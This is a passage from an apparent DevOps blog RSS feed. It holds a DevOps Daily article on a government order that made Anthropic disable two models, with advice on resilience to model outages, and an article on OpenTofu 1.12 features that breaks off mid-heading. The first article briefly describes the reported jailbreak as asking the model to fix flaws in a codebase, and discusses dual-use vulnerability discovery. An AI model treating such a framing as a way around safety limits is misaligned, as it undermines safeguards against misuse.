<p><a href="https://www.redhat.com/en/blog/protecting-enterprise-ai-how-manage-api-keys-models-service-maas"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-decade-of-ubuntu-on-ibm-z-and-ibm-linuxone" class="group relative scroll-mt-24">
        <a href="#h3-a-decade-of-ubuntu-on-ibm-z-and-ibm-linuxone" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A decade of Ubuntu on IBM Z and IBM LinuxONE
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-a-decade-of-ubuntu-on-ibm-z-and-ibm-linuxone"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This year we celebrate a decade of Ubuntu Server support on the s390x architecture: marking a long-standing collaboration between Canonical and IBM that began at LinuxCon 2015. The first release happe</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/a-decade-of-ubuntu-on-ibm-z-and-ibm-linuxone"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-dotinsights-june-2026" class="group relative scroll-mt-24">
        <a href="#h3-dotinsights-june-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 dotInsights | June 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-dotinsights-june-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Did you know? The var keyword isn’t a keyword! It’s one of several “contextual” keywords in C#, and it only has special meaning when used to declare a variable. Try defining a class called var and see</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/dotnet/2026/06/12/dotinsights-june-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-inside-jetpride-how-jetbrains-employees-built-an-lgbtqia-community" class="group relative scroll-mt-24">
        <a href="#h3-inside-jetpride-how-jetbrains-employees-built-an-lgbtqia-community" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Inside JetPride: How JetBrains Employees Built an LGBTQIA+ Community
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-inside-jetpride-how-jetbrains-employees-built-an-lgbtqia-community"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>What makes a workplace feel welcoming? Sometimes it’s finding colleagues who share your interests. Sometimes it’s discovering people with similar experiences. Sometimes it’s knowing you can talk openl</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/life-at-jetbrains/2026/06/inside-jetpride-how-jetbrains-employees-built-an-lgbtqia-community/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-at-the-edge-simplifying-infrastructure-with-cisco-and-canonical" class="group relative scroll-mt-24">
        <a href="#h3-ai-at-the-edge-simplifying-infrastructure-with-cisco-and-canonical" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI at the edge: simplifying infrastructure with Cisco and Canonical
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-at-the-edge-simplifying-infrastructure-with-cisco-and-canonical"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Legacy infrastructure was not designed for the requirements of the AI era. While large-scale model training remains centralized in data centers, test-time inference is rapidly shifting to the edge to </p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/ai-at-the-edge-simplifying-infrastructure-with-cisco-and-canonical"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-mps-20261-release-candidate-arrives" class="group relative scroll-mt-24">
        <a href="#h3-mps-20261-release-candidate-arrives" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 MPS 2026.1 Release Candidate Arrives
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-mps-20261-release-candidate-arrives"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Before we finalize the 2026.1 release, we are presenting a release candidate build so you can preview the new features ahead of time. Download MPS 2026.1 Release Candidate now: DOWNLOAD MPS 2026.1 RC </p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/mps/2026/06/the-mps-2026-1-rc1/"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[The US Government Pulled Two Frontier Models Overnight. The Real Lesson Is About Your Stack]]></title>
      <link>https://devops-daily.com/posts/government-pulled-fable-mythos-what-builders-should-learn</link>
      <description><![CDATA[On June 12, 2026, an export-control directive forced Anthropic to disable Claude Fable 5 and Mythos 5 for every user worldwide, three days after launch. The policy fight is interesting. The operational lesson for anyone building on a single model provider is more urgent.]]></description>
      <pubDate>Sat, 13 Jun 2026 17:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/government-pulled-fable-mythos-what-builders-should-learn</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[ai]]></category><category><![CDATA[llm]]></category><category><![CDATA[resilience]]></category><category><![CDATA[business-continuity]]></category><category><![CDATA[supply-chain]]></category><category><![CDATA[architecture]]></category>
      <content:encoded><![CDATA[<p>On Friday, June 12, 2026, at 5:21pm Eastern, Anthropic received a directive from the US government and, within hours, switched off two of its most capable models, Claude Fable 5 and Claude Mythos 5, for every customer on the planet. The models had been generally available for three days.</p>
<p>If you build on large language models, that sentence is the whole point of this post. Not the politics, not whose side you are on. The operational fact: a dependency that thousands of production systems had started wiring in over a long weekend went to zero, globally, with no notice and no migration window, because of an order its vendor could not refuse. No status page predicted it. No SLA covered it.</p>
<p>Let&#39;s get the facts straight first, then talk about what a sane team does with this.</p>
<h2 id="h2-what-actually-happened" class="group relative scroll-mt-24">
        <a href="#h2-what-actually-happened" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What actually happened
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-actually-happened"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The basics, drawn from <a href="https://www.anthropic.com/news/fable-mythos-access">Anthropic&#39;s own statement</a> and reporting by <a href="https://www.cnbc.com/2026/06/12/anthropic-disables-access-to-fable-5-and-mythos-5-to-comply-with-government-directive.html">CNBC</a>, <a href="https://www.bloomberg.com/news/articles/2026-06-13/anthropic-says-us-limits-foreign-access-to-fable-5-mythos-5">Bloomberg</a>, <a href="https://fortune.com/2026/06/13/anthropic-disables-fable-mythos-export-controls-national-security-threat/">Fortune</a>, and <a href="https://thenewstack.io/us-gov-orders-anthropic-to-pull-fable-5-and-mythos-5-three-days-after-launch/">The New Stack</a>:</p>
<ul>
<li>The instrument was an <strong>export-control directive</strong> issued on national-security grounds. Per reporting, Commerce Secretary Howard Lutnick sent it to Anthropic CEO Dario Amodei, requiring a license for the export, re-export, or domestic transfer of the two models, and extending the restriction to <strong>any foreign national, including those on US soil and Anthropic&#39;s own foreign-national employees</strong>.</li>
<li>The stated trigger was that the government had become aware of a method of <strong>jailbreaking Fable 5</strong>. Anthropic says the government provided only verbal evidence of what it characterizes as &quot;a narrow, non-universal jailbreak.&quot;</li>
<li>Because Anthropic cannot reliably identify which of its users are foreign nationals in real time, a targeted block was not practical. The only way to comply was a <strong>hard shutoff for everyone</strong>. As the company put it, &quot;we must abruptly disable Fable 5 and Mythos 5 for all our customers to ensure compliance.&quot;</li>
<li><strong>Only those two models are affected.</strong> Every other Claude model stayed online. Anthropic said it is complying with the directive while working to restore access, and made clear it disagrees with the decision.</li>
</ul>
<p>Anthropic&#39;s public objection is worth quoting fairly, because it frames the disagreement: the company argues a &quot;narrow potential jailbreak&quot; should not justify recalling a model &quot;deployed to hundreds of millions of people,&quot; and notes the capability in question is, by its account, already available in other public models. We are not here to adjudicate that. The government has national-security information it has not made public; Anthropic has a commercial model it believes was pulled on thin, verbally-conveyed evidence. Both of those can be true at once.</p>
<h2 id="h2-the-detail-that-should-make-every-engineer-look-up" class="group relative scroll-mt-24">
        <a href="#h2-the-detail-that-should-make-every-engineer-look-up" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The detail that should make every engineer look up
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-detail-that-should-make-every-engineer-look-up"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the part that turns this from an AI-policy story into a DevOps story.</p>
<p>The capability the government reportedly found alarming, according to Anthropic&#39;s description of the jailbreak, &quot;essentially consists of asking the model to read a specific codebase and fix any software flaws.&quot;</p>
<p>Read that again. The thing deemed a national-security risk is <strong>reading a codebase and fixing its flaws</strong>. That is not an exotic misuse. That is the core loop of every AI coding assistant, every &quot;review this PR&quot; bot, every automated dependency-patch tool a lot of us shipped this year. The reason a regulator can look at it and see a weapon is that &quot;find and fix the flaws in this code&quot; and &quot;find and weaponize the flaws in this code&quot; are the same sentence with a different verb at the end. Automated vulnerability discovery is dual-use by nature, and a model good enough to fix your bugs at scale is good enough to find everyone else&#39;s.</p>
<p>You do not have to agree with the order to notice what it signals: the most economically useful thing AI does for engineering, reasoning about code, is now squarely inside the blast radius of export control. Whatever happens with Fable 5 specifically, that regulatory attention is not going back in the box. If your roadmap assumes frictionless, permanent access to frontier code-reasoning models, that assumption now has a footnote.</p>
<h2 id="h2-why-this-is-a-continuity-problem-not-a-news-item" class="group relative scroll-mt-24">
        <a href="#h2-why-this-is-a-continuity-problem-not-a-news-item" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why this is a continuity problem, not a news item
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-why-this-is-a-continuity-problem-not-a-news-item"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Outages we plan for. A region goes down, a provider has a bad day, a rate limit bites. We have playbooks: retries, fallbacks, multi-region, circuit breakers. What happened here is a different shape of failure, and it breaks the assumptions those playbooks rest on:</p>
<ul>
<li><strong>It was instantaneous and total.</strong> Not degraded, not regional. Zero, worldwide, the same evening.</li>
<li><strong>It was indefinite.</strong> &quot;Working to restore access&quot; is not a time you can put in a runbook. The resolution depends on a government and a license process, not an incident bridge.</li>
<li><strong>No contract protects you.</strong> Your enterprise agreement&#39;s uptime credits do not apply when a model is pulled by legal order. Force majeure cuts the other way.</li>
<li><strong>It targeted a specific model, not the platform.</strong> The provider stayed up. Auth worked. Billing worked. The one thing that vanished was the exact model id you pinned in your config because it passed your evals.</li>
</ul>
<p>That last point is the trap. Teams pin a model version precisely so behavior stays stable. Pinning gives you reproducibility right up until the pinned artifact is the thing that disappears, at which point your &quot;stable&quot; choice is your single point of failure and the unpinned fallback you never built is the thing that would have saved you.</p>
<h2 id="h2-what-a-resilient-setup-looks-like" class="group relative scroll-mt-24">
        <a href="#h2-what-a-resilient-setup-looks-like" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What a resilient setup looks like
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-a-resilient-setup-looks-like"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>None of this is an argument against building on frontier models. They are too useful, and the same risk in milder forms (a deprecation, a price change, a capacity crunch, a region restriction) has always existed. It is an argument for treating the model the way you already treat a database, a payment processor, or any other vendor your product cannot run without: as a dependency with a continuity plan. Concretely:</p>
<ol>
<li><strong>Put an abstraction between your code and the provider.</strong> A thin internal interface, or a gateway/router (LiteLLM, your own proxy, a managed router), so that &quot;which model serves this request&quot; is one config change, not a refactor scattered across forty call sites. If switching providers is a deploy, not a project, you have already won most of this fight.</li>
<li><strong>Qualify a fallback from a different provider, not just a different model.</strong> A second Anthropic model would not have helped a Fable 5 user here, but it would not help against a provider-wide event either. Keep at least one model from a separate vendor passing your evals, so &quot;fail over&quot; is a decision you have already rehearsed.</li>
<li><strong>Keep an eval harness you can run on demand.</strong> The reason teams fear switching models is they do not know what will break. A saved suite of your real prompts with expected-output checks turns &quot;we cannot risk changing models&quot; into &quot;the candidate scores 96% of baseline, ship it.&quot; This is the single highest-impact thing on the list, and you can build it this week. (We are fans of measuring before believing; it is the same instinct behind our <a href="https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks">serverless Postgres benchmarks</a>.)</li>
<li><strong>Design graceful degradation, not just failover.</strong> Decide in advance what each AI feature does when no model is available. Queue and retry later? Fall back to a smaller local model? Disable the feature with an honest message? A feature that 500s because its model vanished is a worse outage than one that degrades on purpose.</li>
<li><strong>Know your data and prompt portability.</strong> If your prompts, few-shot examples, and tool definitions are tuned to one model&#39;s quirks, your &quot;fallback&quot; is theoretical. Keep prompts as portable as you reasonably can, and note where you have provider-specific tuning so a switch is scoped, not surprising.</li>
<li><strong>Watch the policy surface, not just the status page.</strong> Export-control and safety-driven actions do not show up on status.provider.com. For anything load-bearing, someone on the team should be tracking the regulatory and policy noise around your providers the way you track their incident history.</li>
</ol>
<h2 id="h2-the-honest-caveats" class="group relative scroll-mt-24">
        <a href="#h2-the-honest-caveats" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The honest caveats
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-honest-caveats"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A few things this post is not saying.</p>
<p>It is not saying Anthropic handled this badly. Complying with a lawful government directive within hours while publicly stating disagreement is roughly what you would want a vendor to do, and the transparency of the statement is more than many companies offer. It is also not saying the government is wrong; national-security decisions are made on information the rest of us cannot see, and &quot;we do not get to read the evidence&quot; is the normal condition of these cases, not a scandal.</p>
<p>And it is not saying you should rip out your AI provider. Concentration risk is a spectrum, not a switch. The right amount of redundancy for a hobby project and for a system that pages you at 3am are very different, and over-engineering a multi-provider mesh for a feature nobody depends on is its own kind of waste.</p>
<p>What it is saying: the failure mode of &quot;the specific model our product is built on becomes legally unavailable, everywhere, tonight&quot; moved from hypothetical to documented on June 12. If you would struggle to answer &quot;what do we do if our primary model is gone tomorrow morning,&quot; that is the work this week, while it is a thought experiment with a real example attached rather than your own incident channel lighting up.</p>
<p>Models are infrastructure now. Infrastructure gets a continuity plan.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[OpenTofu 1.12: destroy = false Retires the tofu state rm Ritual]]></title>
      <link>https://devops-daily.com/posts/opentofu-1-12-destroy-false-state-surgery</link>
      <description><![CDATA[OpenTofu 1.12 lets a resource declare that it should be forgotten instead of destroyed, makes prevent_destroy dynamic, and quietly ends the manual providers lock step. Here is what each change does, plus the footguns the release notes will not warn you about.]]></description>
      <pubDate>Fri, 12 Jun 2026 15:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/opentofu-1-12-destroy-false-state-surgery</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[opentofu]]></category><category><![CDATA[terraform]]></category><category><![CDATA[infrastructure-as-code]]></category><category><![CDATA[state-management]]></category><category><![CDATA[devops]]></category>
      <content:encoded><![CDATA[<p>Every team running OpenTofu or Terraform at scale has a version of the same ritual. A database needs to leave this workspace&#39;s management without being deleted: maybe it is being handed to another team, maybe it is migrating to a different state file, maybe someone is splitting a monolithic root module. So an engineer opens a terminal, runs <code>tofu state rm aws_db_instance.main</code>, pastes the output into a Slack thread as proof, and everyone quietly hopes the config edit that should accompany it lands before the next plan tries to recreate the thing.</p>
<p><a href="https://opentofu.org/blog/opentofu-1-12-0/">OpenTofu 1.12</a> (released May 14) is the first release that treats this workflow as something the language should handle instead of the operator. It is a short changelog with unusually high practical density, so this is a feature-by-feature read with the failure modes included.</p>
<h2 id="h2-destroy-false-forget-instead-of-destroy" class="group relative scroll-mt-24">
        <a href="#h2-destroy-false-forget-instead-of-destroy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          destroy = false: forget instead of destroy
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-destroy-false-forget-instead-of-destroy"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The new lifecycle meta-argument:</p>
<pre><code class="hljs language-hcl"><span class="hljs-keyword">resource</span> <span class="hljs-string">&quot;aws_db_instance&quot;</span> <span class="hljs-string">&quot;main&quot;</span> {
  <span class="hljs-comment"># ...</span>

  lifecycle {
    destroy = false
  }
}
</code></pre><p>A resource carrying <code>destroy = false</code> is never destroyed by OpenTofu. In every situation that would normally delete the remote object, OpenTofu instead <em>forgets</em> it: the entry is removed from state, and the real infrastructure stays untouched. That applies in three places:</p>
<ul>
<li><strong>Removing the resource from configuration.</strong> Delete the block, run plan, and the object leaves state without leaving the cloud. This is the <code>state rm</code> replacement, except it goes through plan and review like everything else.</li>
<li><strong>Replacement.</strong> If a change forces replacement, the old instance is forgotten rather than destroyed, and a new one is created per the current config. Useful when the old object must survive for a cutover; surprising if you expected replacement to clean up after itself.</li>
<li><strong><code>tofu destroy</code>.</strong> The marked resource is forgotten, everything else is destroyed, and the command exits with a non-zero status code to signal that some resources were not fully removed.</li>
</ul>
<p>Three behaviors here deserve more attention than the release notes give them.</p>
<p>First, <strong>the setting is persisted in state</strong>. Once applied, OpenTofu will not plan that resource&#39;s destruction until you explicitly flip it back. The protection follows the resource, not the current copy of the config, which is the safe choice and also the one that will confuse whoever investigates &quot;why won&#39;t this delete&quot; eight months from now.</p>
<p>Second, <strong>it takes precedence over <code>prevent_destroy</code></strong>. If both are set, <code>destroy = false</code> wins: instead of erroring on a destroy attempt, the resource is silently forgotten. The two arguments express different intents (never let this die vs. this is not mine to kill), and you should pick one deliberately rather than stacking them.</p>
<p>Third, <strong>the non-zero exit from <code>tofu destroy</code> will break pipelines that treat destroy as pass/fail</strong>. Ephemeral environment teardown jobs are the obvious case: the destroy succeeded by design, the marked resource was meant to survive, and your CI goes red anyway. If you adopt <code>destroy = false</code> in anything an automation destroys, that job needs to distinguish &quot;failed&quot; from &quot;completed with forgotten resources&quot; from day one.</p>
<p>And the footgun the docs do warn about, repeated here because someone will hit it: once forgotten, the object is invisible to OpenTofu. Add the same resource block back later and plan will try to <em>create</em> it, which fails (or worse, half-succeeds) because the object still exists remotely. The forget-then-re-add path goes through <code>tofu import</code>, same as any other unmanaged object.</p>
<p>One limitation: <code>destroy</code> only accepts a constant boolean. Which is interesting, because its sibling just lost that restriction.</p>
<h2 id="h2-prevent_destroy-is-dynamic-now" class="group relative scroll-mt-24">
        <a href="#h2-prevent_destroy-is-dynamic-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          prevent_destroy is dynamic now
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prevent_destroy-is-dynamic-now"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Since the beginning, <code>prevent_destroy</code> demanded a hardcoded literal. The classic consequence: shared modules either shipped two variants (one strict, one not) or left protection off and hoped. As of 1.12:</p>
<pre><code class="hljs language-hcl">lifecycle {
  prevent_destroy = var.environment == <span class="hljs-string">&quot;production&quot;</span>
}
</code></pre><p>The argument can reference symbols in the same module, so a single database module can refuse destruction in production and allow it in ephemeral environments, decided by the caller. Terraform still requires the static literal, so this is also one of the clearest divergence points between the two projects to date: not a new block, but a restriction removed from a fifteen-year-old one.</p>
<p>Worth knowing before you parameterize everything: protection that depends on a variable is protection that can be turned off by changing an input, possibly far from the module, possibly by automation. For the resources where <code>prevent_destroy</code> was doing real work as a last line of defense, a hardcoded <code>true</code> is still the stronger statement. The dynamic form is for the wide middle ground where the old static rule forced you to choose between duplicate modules and no guardrail at all.</p>
<h2 id="h2-the-smaller-changes-that-touch-your-ci-anyway" class="group relative scroll-mt-24">
        <a href="#h2-the-smaller-changes-that-touch-your-ci-anyway" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The smaller changes that touch your CI anyway
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-smaller-changes-that-touch-your-ci-anyway"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p><strong>Provider checksums complete themselves.</strong> <code>tofu init</code> now writes a full set of checksums for all platforms into the dependency lock file, using both <code>zh:</code> and <code>h1:</code> hashes, without the separate <code>tofu providers lock</code> step that teams bolted into their workflows (and that anyone with a mixed macOS/Linux team learned the hard way). Two operational notes: the first <code>init</code> after upgrading rewrites your lock file with the added <code>h1:</code> hashes, so expect a one-time noisy diff and merge it deliberately; and if a renovate-style bot regenerates lock files, its next PR will carry that churn too.</p>
<p><strong><code>-json-into=FILENAME</code></strong> gives you machine-readable output and human-readable output from the same run: JSON streams to the file (named pipes work, so <code>/dev/fd/N</code> tricks are on the table), while the terminal keeps the normal rendering. The previous choice was one or the other, which is why so many pipelines run plan twice or pipe JSON through a prettifier. One run, both audiences.</p>
<p><strong>Deprecations:</strong> WinRM support for provisioners is deprecated with removal planned for 1.13 (the few teams still bootstrapping Windows hosts through provisioners should start the SSH or image-baking migration now), and official 32-bit builds (<code>386</code>, <code>arm</code>) begin phasing out with warnings expected in 1.13.</p>
<h2 id="h2-where-this-leaves-the-terraform-comparison" class="group relative scroll-mt-24">
        <a href="#h2-where-this-leaves-the-terraform-comparison" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where this leaves the Terraform comparison
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
